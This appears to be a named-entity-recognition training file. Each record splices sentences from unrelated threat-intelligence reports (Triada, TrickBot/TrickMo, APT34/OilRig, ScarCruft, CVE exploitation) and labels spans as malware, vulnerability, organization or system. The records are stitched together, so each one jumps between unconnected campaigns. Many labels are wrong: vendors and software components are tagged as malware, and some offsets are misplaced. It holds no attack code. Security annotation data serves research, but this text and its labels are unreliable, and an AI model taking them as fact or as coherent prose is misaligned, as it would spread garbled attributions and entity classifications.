{"text": "First , it modifies the Zygote process . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries .", "spans": [{"start": 24, "end": 30, "label": "System"}, {"start": 104, "end": 117, "label": "Vulnerability"}, {"start": 121, "end": 126, "label": "System"}, {"start": 337, "end": 355, "label": "Organization"}, {"start": 360, "end": 378, "label": "Organization"}]}
{"text": "Zygote is the core process in the Android OS that is used as a template for every application , which means that once the Trojan gets into Zygote , it becomes a part of literally every app that is launched on the device . Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . This suggests that the threat actors are not only focused on financial organizations , as their target set could include other industries as well .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 34, "end": 41, "label": "System"}, {"start": 139, "end": 145, "label": "System"}, {"start": 261, "end": 296, "label": "Vulnerability"}, {"start": 358, "end": 364, "label": "Organization"}, {"start": 389, "end": 412, "label": "Organization"}]}
{"text": "Triada : organized crime on Android Second , it substitutes the system functions and conceals its modules from the list of the running processes and installed apps . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . The email address edmundj@chmail.ir and the geolocation of Tehran , Iran , being of note .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 28, "end": 35, "label": "System"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 292, "end": 297, "label": "System"}]}
{"text": "So the system doesn \u2019 t see any strange processes running and thus does not cry the alarm . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . The registrant information for kernel.ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle.org was the same used for mydomain1607.com , chmail.ir .", "spans": [{"start": 160, "end": 173, "label": "Vulnerability"}, {"start": 297, "end": 311, "label": "Organization"}]}
{"text": "Those are not the only system functions Triada modifies . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . The mydomain1110.com domain did not appear to reuse any of the previously observed WHOIS data artifacts , but did still give a geolocation of Tehran in addition to the use of an email address linked to other domains thematically similar to the know command and control domains and are potentially related .", "spans": [{"start": 40, "end": 46, "label": "Malware"}, {"start": 99, "end": 113, "label": "Vulnerability"}, {"start": 400, "end": 405, "label": "System"}]}
{"text": "As our researchers discovered , it also lays its hands on the outgoing SMS and filters the incoming ones . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . While researching the OilRig campaign , we have seen two waves of targeted attacks on Saudi Arabian organizations in which a group of threat actors delivered the Helminth Trojan as a payload .", "spans": [{"start": 135, "end": 157, "label": "Vulnerability"}, {"start": 455, "end": 461, "label": "Organization"}]}
{"text": "That is actually how the bad guys decided to monetize the Trojan . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . The two variants of Helminth do require different delivery methods , with the script variant relying on an Excel spreadsheet for delivery , while the executable variant is more traditional in the fact that it can be installed without a delivery document .", "spans": [{"start": 82, "end": 95, "label": "Organization"}, {"start": 161, "end": 169, "label": "Vulnerability"}, {"start": 223, "end": 236, "label": "Organization"}, {"start": 289, "end": 297, "label": "Malware"}]}
{"text": "Some applications rely on SMS when it comes to in-app purchases \u2014 the transaction data is transferred via a short text message . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . Since our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new activity .", "spans": [{"start": 129, "end": 138, "label": "Organization"}, {"start": 155, "end": 164, "label": "Organization"}, {"start": 194, "end": 202, "label": "Vulnerability"}, {"start": 205, "end": 218, "label": "Vulnerability"}]}
{"text": "The main reason for developers to choose SMS over traditional payments via Internet is that in the case with SMS no Internet connection is required . Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . Additionally , the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia , but also a company in Qatar and government organizations in Turkey , Israel and the United States .", "spans": [{"start": 215, "end": 228, "label": "Vulnerability"}, {"start": 231, "end": 244, "label": "Vulnerability"}, {"start": 477, "end": 501, "label": "Organization"}]}
{"text": "Users do not see those SMS because they are processed not by the SMS app , but by the app that has initiated the transaction \u2014 e.g a free-to-play game . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims .", "spans": [{"start": 235, "end": 243, "label": "Vulnerability"}, {"start": 244, "end": 257, "label": "Vulnerability"}, {"start": 334, "end": 340, "label": "System"}]}
{"text": "Triada \u2019 s functionality allows it to modify those messages , so the money is sent not to some app developer , but to the malware operators . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . In addition to these instances , multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth samples earlier this year .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 142, "end": 154, "label": "Organization"}, {"start": 181, "end": 212, "label": "System"}, {"start": 236, "end": 247, "label": "Organization"}, {"start": 274, "end": 294, "label": "Vulnerability"}, {"start": 339, "end": 359, "label": "Organization"}, {"start": 412, "end": 428, "label": "Malware"}]}
{"text": "Triada steals the money either from the users \u2014 if they haven \u2019 t succeeded in purchasing whatever they wanted , or from the app developers , in case the user has completed the purchase successfully . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . While the malware deployed is not terribly sophisticated , it uses techniques such as DNS command and control ( C2 ) that allows it to stay under the radar at many establishments .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 201, "end": 213, "label": "Organization"}, {"start": 244, "end": 265, "label": "Vulnerability"}, {"start": 421, "end": 423, "label": "System"}]}
{"text": "For now , that is the only way how cybercriminals can profit from Triada , but don \u2019 t forget that it \u2019 s a modular Trojan , so it can be turned into literally everything on one command from the C & C server . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": [{"start": 66, "end": 72, "label": "Malware"}, {"start": 221, "end": 235, "label": "Vulnerability"}, {"start": 305, "end": 318, "label": "Vulnerability"}, {"start": 378, "end": 391, "label": "Organization"}, {"start": 404, "end": 432, "label": "Vulnerability"}, {"start": 458, "end": 467, "label": "Organization"}, {"start": 487, "end": 501, "label": "Vulnerability"}, {"start": 522, "end": 529, "label": "Organization"}, {"start": 542, "end": 550, "label": "Organization"}, {"start": 560, "end": 567, "label": "Vulnerability"}, {"start": 576, "end": 592, "label": "System"}, {"start": 619, "end": 642, "label": "Organization"}]}
{"text": "Fighting organized crime in your phone One of the main problems with Triada is that it can potentially hurt a LOT of people . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . We assess this activity was carried out by a suspected Iranian cyber espionage threat group , whom we refer to as APT34 , using a custom PowerShell backdoor to achieve its objectives .", "spans": [{"start": 69, "end": 75, "label": "Malware"}, {"start": 153, "end": 160, "label": "Organization"}, {"start": 206, "end": 219, "label": "Vulnerability"}, {"start": 365, "end": 370, "label": "Organization"}, {"start": 381, "end": 407, "label": "Malware"}]}
{"text": "As we \u2019 ve mentioned earlier , Triada is downloaded by smaller Trojans that have leveraged the access privileges . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East .", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 292, "end": 302, "label": "Organization"}, {"start": 396, "end": 405, "label": "Organization"}, {"start": 408, "end": 418, "label": "Organization"}, {"start": 421, "end": 427, "label": "Organization"}, {"start": 430, "end": 438, "label": "Organization"}, {"start": 445, "end": 463, "label": "Organization"}]}
{"text": "And our researchers estimate that in every 10 Android users 1 was attacked by either one or several of those Trojans during the second half of 2015 , so there are millions of devices with a huge possibility of being infected with Triada . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": [{"start": 46, "end": 53, "label": "System"}, {"start": 230, "end": 236, "label": "Malware"}, {"start": 339, "end": 352, "label": "Vulnerability"}, {"start": 357, "end": 370, "label": "Vulnerability"}, {"start": 569, "end": 574, "label": "Organization"}]}
{"text": "So , what can you do to protect yourself from this stealthy beast ? One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts , sometimes coupled with social engineering tactics .", "spans": [{"start": 99, "end": 121, "label": "Vulnerability"}, {"start": 152, "end": 160, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 183, "end": 210, "label": "Malware"}, {"start": 262, "end": 282, "label": "Malware"}]}
{"text": "1 . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . We believe APT34 is involved in a long-term Cyber Espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 34, "end": 49, "label": "Vulnerability"}, {"start": 134, "end": 139, "label": "Organization"}]}
{"text": "Never forget to update your system . The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools\u2014EternalRomance and EternalSynergy\u2014that were also released as part of the Shadow Brokers leak . In May 2016 , we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware .", "spans": [{"start": 56, "end": 69, "label": "Vulnerability"}, {"start": 248, "end": 262, "label": "Organization"}, {"start": 350, "end": 355, "label": "Organization"}, {"start": 432, "end": 438, "label": "Malware"}, {"start": 439, "end": 446, "label": "Malware"}]}
{"text": "It turns out that those smaller Trojans face serious problems trying to get root access on Android 4.4.4 and above , because a lot of vulnerabilities were patched in these versions . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . In July 2017 , we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER , based on strings within the malware .", "spans": [{"start": 91, "end": 104, "label": "System"}, {"start": 197, "end": 210, "label": "Vulnerability"}, {"start": 253, "end": 266, "label": "Vulnerability"}, {"start": 304, "end": 309, "label": "Organization"}, {"start": 355, "end": 380, "label": "Malware"}, {"start": 394, "end": 402, "label": "Malware"}, {"start": 480, "end": 491, "label": "Malware"}]}
{"text": "So if you have Android 4.4.4 or some more recent version of this OS on your device , your chances of getting infected with Triada are significantly lower . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . APT34 loosely aligns with public reporting related to the group \" OilRig \" .", "spans": [{"start": 15, "end": 28, "label": "System"}, {"start": 123, "end": 129, "label": "Malware"}, {"start": 210, "end": 224, "label": "Organization"}, {"start": 286, "end": 294, "label": "Organization"}, {"start": 303, "end": 308, "label": "Organization"}, {"start": 369, "end": 375, "label": "Organization"}]}
{"text": "Yet our statistics says that about 60 % of Android users are still sitting with Android 4.4.2 and below . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": [{"start": 43, "end": 50, "label": "System"}, {"start": 80, "end": 103, "label": "System"}, {"start": 155, "end": 163, "label": "Organization"}, {"start": 164, "end": 179, "label": "Vulnerability"}, {"start": 295, "end": 304, "label": "Indicator"}, {"start": 320, "end": 333, "label": "Vulnerability"}]}
{"text": "Triada : organized crime on Android 2 . CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 28, "end": 35, "label": "System"}, {"start": 40, "end": 53, "label": "Vulnerability"}, {"start": 89, "end": 109, "label": "Malware"}, {"start": 114, "end": 133, "label": "Malware"}, {"start": 225, "end": 230, "label": "Organization"}, {"start": 252, "end": 268, "label": "System"}, {"start": 283, "end": 297, "label": "Vulnerability"}, {"start": 308, "end": 316, "label": "Malware"}, {"start": 321, "end": 332, "label": "Malware"}]}
{"text": "Better not to take any chances at all , no matter which version of the OS you use . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . The vulnerability was patched by Microsoft on Nov 14 , 2017 .", "spans": [{"start": 89, "end": 92, "label": "Malware"}, {"start": 112, "end": 125, "label": "Vulnerability"}, {"start": 129, "end": 141, "label": "Malware"}, {"start": 177, "end": 186, "label": "Organization"}]}
{"text": "So we recommend installing an anti-virus solution on your Android device . At this time , we do not believe that the attackers found a new ASA exploit . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": [{"start": 90, "end": 92, "label": "Organization"}, {"start": 117, "end": 126, "label": "Organization"}, {"start": 139, "end": 142, "label": "Vulnerability"}, {"start": 143, "end": 150, "label": "Vulnerability"}, {"start": 189, "end": 204, "label": "Malware"}, {"start": 207, "end": 219, "label": "Malware"}, {"start": 239, "end": 248, "label": "Organization"}]}
{"text": "Kaspersky Internet Security for Android detects all three of Triada \u2019 s modules , so it can save your money from cybercriminals that are behind Triada . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East .", "spans": [{"start": 0, "end": 27, "label": "System"}, {"start": 32, "end": 39, "label": "System"}, {"start": 61, "end": 67, "label": "Malware"}, {"start": 144, "end": 150, "label": "Malware"}, {"start": 168, "end": 174, "label": "Organization"}, {"start": 188, "end": 201, "label": "Vulnerability"}, {"start": 413, "end": 418, "label": "Organization"}, {"start": 509, "end": 522, "label": "Vulnerability"}, {"start": 527, "end": 541, "label": "Vulnerability"}]}
{"text": "Just don \u2019 t forget that the scan does not run automatically in the free version . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region .", "spans": [{"start": 229, "end": 235, "label": "Malware"}, {"start": 255, "end": 269, "label": "Vulnerability"}, {"start": 273, "end": 286, "label": "Vulnerability"}, {"start": 293, "end": 305, "label": "Organization"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 320, "end": 332, "label": "Organization"}]}
{"text": "But all in all Triada is yet another example of a really bad trend : malware developers are taking Android seriously , and the latest samples are almost as complex and hard to withstand , as their Windows-based kin . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region .", "spans": [{"start": 15, "end": 21, "label": "Malware"}, {"start": 99, "end": 106, "label": "System"}, {"start": 197, "end": 210, "label": "System"}, {"start": 269, "end": 278, "label": "Malware"}, {"start": 299, "end": 312, "label": "Vulnerability"}, {"start": 381, "end": 386, "label": "Organization"}]}
{"text": "The only good way to fight all these threats is to be proactive , and so a good security solution is a must . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region .", "spans": [{"start": 110, "end": 117, "label": "Organization"}, {"start": 196, "end": 199, "label": "Malware"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 247, "end": 259, "label": "Organization"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 274, "end": 286, "label": "Organization"}]}
{"text": "TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany March 24 , 2020 IBM X-Force researchers analyzed an Android malware app that \u2019 s likely being pushed to infected users by the TrickBot Trojan . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . We first discovered this group in mid-2016 , although it is possible their operations extends earlier than that time frame .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 79, "end": 90, "label": "Organization"}, {"start": 115, "end": 122, "label": "System"}, {"start": 189, "end": 197, "label": "Malware"}, {"start": 207, "end": 220, "label": "Vulnerability"}, {"start": 298, "end": 310, "label": "Organization"}]}
{"text": "This app , dubbed \u201c TrickMo \u201d by our team , is designed to bypass second factor and strong authentication pushed to bank customers when they need to authorize a transaction . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . Between May and June 2018 , Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East .", "spans": [{"start": 20, "end": 27, "label": "Malware"}, {"start": 203, "end": 217, "label": "Vulnerability"}, {"start": 222, "end": 235, "label": "Vulnerability"}, {"start": 242, "end": 252, "label": "System"}, {"start": 301, "end": 307, "label": "Organization"}, {"start": 485, "end": 492, "label": "Organization"}, {"start": 526, "end": 538, "label": "Organization"}, {"start": 569, "end": 586, "label": "Organization"}]}
{"text": "While it \u2019 s not the first of its kind , this Android malware app is more sophisticated than similar apps and possesses interesting features that enable its operators to steal transaction authorization codes from victims who download the app . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . The use of script-based backdoors is a common technique used by the OilRig group as we have previously documented .", "spans": [{"start": 46, "end": 53, "label": "System"}, {"start": 334, "end": 347, "label": "Organization"}, {"start": 366, "end": 379, "label": "Vulnerability"}, {"start": 389, "end": 403, "label": "System"}, {"start": 417, "end": 439, "label": "Malware"}, {"start": 474, "end": 486, "label": "Organization"}]}
{"text": "According to our research , TrickMo is still under active development as we expect to see frequent changes and updates . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . The attacks delivered a PowerShell backdoor called QUADAGENT , a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye .", "spans": [{"start": 28, "end": 35, "label": "Malware"}, {"start": 158, "end": 171, "label": "Organization"}, {"start": 224, "end": 237, "label": "Vulnerability"}, {"start": 363, "end": 382, "label": "Malware"}, {"start": 390, "end": 399, "label": "Malware"}, {"start": 427, "end": 439, "label": "Organization"}, {"start": 448, "end": 471, "label": "Organization"}, {"start": 476, "end": 483, "label": "Organization"}]}
{"text": "While it can be used anywhere and target any bank or region , at this time , we are seeing it deployed specifically in Germany . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation .", "spans": [{"start": 195, "end": 209, "label": "Vulnerability"}, {"start": 276, "end": 290, "label": "Malware"}, {"start": 321, "end": 333, "label": "Malware"}, {"start": 472, "end": 484, "label": "Organization"}, {"start": 494, "end": 511, "label": "Malware"}, {"start": 574, "end": 592, "label": "Malware"}]}
{"text": "Germany is one of the first attack turfs TrickBot spread to when it first emerged in 2016 . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East .", "spans": [{"start": 41, "end": 49, "label": "Malware"}, {"start": 179, "end": 192, "label": "Vulnerability"}, {"start": 210, "end": 235, "label": "Malware"}, {"start": 238, "end": 250, "label": "Malware"}, {"start": 391, "end": 408, "label": "Organization"}]}
{"text": "In 2020 , it appears that TrickBot \u2019 s vast bank fraud is an ongoing project that helps the gang monetize compromised accounts . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT Maudi Surveillance Operation which was previously reported in 2013 . This latest attack consisted of three waves between May and June 2018 .", "spans": [{"start": 26, "end": 34, "label": "Malware"}, {"start": 129, "end": 138, "label": "Organization"}, {"start": 183, "end": 196, "label": "Vulnerability"}, {"start": 274, "end": 279, "label": "Organization"}]}
{"text": "First Signs in September 2019 In September 2019 , a tweet by CERT-Bund caught the attention of the IBM Trusteer Mobile Security Research team . specifically CVE-2018-0798 , before downloading subsequent payloads . The OilRig group continues to be a persistent adversary group in the Middle East region .", "spans": [{"start": 61, "end": 70, "label": "Organization"}, {"start": 99, "end": 136, "label": "Organization"}, {"start": 157, "end": 170, "label": "Vulnerability"}, {"start": 218, "end": 230, "label": "Organization"}]}
{"text": "The tweet stated that TrickBot , a well-known banking Trojan owned by an organized cybercrime gang , uses man-in-the-browser ( MITB ) web injects in online banking sessions to ask infected users for their mobile phone number and device type . Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . APT34 are involved in long-term cyber espionage operations largely focused on the Middle East .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 250, "end": 267, "label": "Organization"}, {"start": 366, "end": 381, "label": "Vulnerability"}, {"start": 449, "end": 454, "label": "Organization"}]}
{"text": "Machine translation of this tweet reads : \u201c Watch out for online banking : Emotet reloads TrickBot . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications .", "spans": [{"start": 75, "end": 81, "label": "Malware"}, {"start": 90, "end": 98, "label": "Malware"}, {"start": 111, "end": 116, "label": "Organization"}, {"start": 153, "end": 160, "label": "Vulnerability"}, {"start": 170, "end": 183, "label": "Vulnerability"}, {"start": 313, "end": 322, "label": "Organization"}, {"start": 325, "end": 335, "label": "Organization"}, {"start": 338, "end": 344, "label": "Organization"}, {"start": 347, "end": 355, "label": "Organization"}, {"start": 362, "end": 380, "label": "Organization"}]}
{"text": "On infected PCs , TrickBot displays a query for the mobile phone number and the device type used for banking and then prompts users to install an alleged security app. \u201d When banking Trojans ask for this type of information , it usually means the next step will be an attempt to infect the victim \u2019 s mobile device . We\u2019ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Recent investigations by FireEye 's Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of a suspected Iranian threat group , that we believe has been operating since at least 2014 .", "spans": [{"start": 18, "end": 26, "label": "Malware"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 451, "end": 465, "label": "Vulnerability"}, {"start": 493, "end": 512, "label": "Organization"}, {"start": 557, "end": 591, "label": "Organization"}]}
{"text": "Our team went ahead and hunted for samples of the app and analyzed it in our labs . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government , with a mission that would benefit nation-state geopolitical and economic needs .", "spans": [{"start": 117, "end": 127, "label": "Malware"}, {"start": 312, "end": 326, "label": "Vulnerability"}, {"start": 433, "end": 451, "label": "Organization"}, {"start": 488, "end": 513, "label": "Organization"}, {"start": 518, "end": 526, "label": "Organization"}]}
{"text": "In this analysis , we get into the capabilities of the new variant and what we found to be a \u201c kill switch \u201d that can eliminate the malware remotely from an infected device . The actor attempts to exploit CVE-2018\u20138440 \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified proof-of-concept exploit . On January 8 , 2018 , Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East .", "spans": [{"start": 179, "end": 184, "label": "Organization"}, {"start": 205, "end": 218, "label": "Vulnerability"}, {"start": 247, "end": 260, "label": "Vulnerability"}, {"start": 383, "end": 399, "label": "Vulnerability"}, {"start": 400, "end": 407, "label": "Vulnerability"}, {"start": 432, "end": 439, "label": "Organization"}, {"start": 453, "end": 459, "label": "Organization"}, {"start": 499, "end": 515, "label": "Organization"}]}
{"text": "Desktop Trojans and Their Mobile Component The process by which Trojans attempt to infect mobile devices is at least a decade old . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts from trusted third parties , sometimes coupled with social engineering tactics .", "spans": [{"start": 136, "end": 149, "label": "Malware"}, {"start": 278, "end": 291, "label": "Vulnerability"}, {"start": 294, "end": 307, "label": "Vulnerability"}, {"start": 312, "end": 325, "label": "Vulnerability"}, {"start": 339, "end": 347, "label": "Organization"}, {"start": 388, "end": 393, "label": "Organization"}, {"start": 408, "end": 435, "label": "Malware"}, {"start": 487, "end": 507, "label": "Malware"}]}
{"text": "Usually , when users are already infected with malware like TrickBot on their desktop , they will see a web injection asking for their mobile device operating system ( OS ) type and phone number . Previously , Cloud Atlas dropped its validator\u201d implant named PowerShower\u201d directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . Just over a week later , on January 16 , 2018 , we observed an attack on a Middle Eastern financial institution .", "spans": [{"start": 60, "end": 68, "label": "Malware"}, {"start": 210, "end": 221, "label": "Organization"}, {"start": 337, "end": 351, "label": "Vulnerability"}, {"start": 363, "end": 376, "label": "Vulnerability"}, {"start": 469, "end": 490, "label": "Organization"}]}
{"text": "Next , if they indicate that they use an Android-based device , the Trojan , impersonating their bank with web injections , fools the victim into installing a fake security app . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 .", "spans": [{"start": 41, "end": 54, "label": "System"}, {"start": 193, "end": 200, "label": "Malware"}, {"start": 261, "end": 274, "label": "Vulnerability"}, {"start": 355, "end": 385, "label": "Indicator"}, {"start": 423, "end": 429, "label": "Organization"}]}
{"text": "The supposed purpose of that app is to obtain and use a required \u201c security code \u201d to log in to their online banking site . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . However , the attack on January 16 did not involve ThreeDollars at all .", "spans": [{"start": 124, "end": 132, "label": "Malware"}, {"start": 186, "end": 205, "label": "Malware"}, {"start": 280, "end": 292, "label": "Malware"}]}
{"text": "Our research team analyzed the malicious Android application that is most likely being spread by TrickBot and dubbed it \u201c TrickMo. \u201d Targeting users in Germany at this time , TrickMo is the latest variation in the transaction authentication number ( TAN ) -stealing malware category . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . Interestingly , the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017 .", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 97, "end": 105, "label": "Malware"}, {"start": 122, "end": 130, "label": "Malware"}, {"start": 175, "end": 182, "label": "Malware"}, {"start": 350, "end": 357, "label": "Vulnerability"}, {"start": 366, "end": 394, "label": "Vulnerability"}, {"start": 497, "end": 509, "label": "Organization"}]}
{"text": "Its main capabilities include : Stealing personal device information Intercepting SMS messages Recording targeted applications for one-time password ( TAN ) Lockdown of the phone Stealing pictures from the device Self-destruction and removal As banks release more advanced security measures , banking malware evolves to keep up with the perpetual arms race . The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . Instead , OilRig 's attack involved delivering the OopsIE Trojan directly to the victim , most likely using a link in a spear phishing email .", "spans": [{"start": 363, "end": 370, "label": "Vulnerability"}, {"start": 380, "end": 389, "label": "Organization"}, {"start": 411, "end": 429, "label": "Malware"}, {"start": 471, "end": 477, "label": "Organization"}, {"start": 512, "end": 525, "label": "Malware"}]}
{"text": "From our analysis of the TrickMo mobile malware , it is apparent that TrickMo is designed to break the newest methods of OTP and , specifically , TAN codes often used in Germany . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . In the January 16 , 2018 attack , we observed OilRig attacking an organization it previously targeted in January 2017 .", "spans": [{"start": 25, "end": 32, "label": "Malware"}, {"start": 70, "end": 77, "label": "Malware"}, {"start": 191, "end": 205, "label": "Organization"}, {"start": 235, "end": 248, "label": "Vulnerability"}, {"start": 284, "end": 297, "label": "Vulnerability"}]}
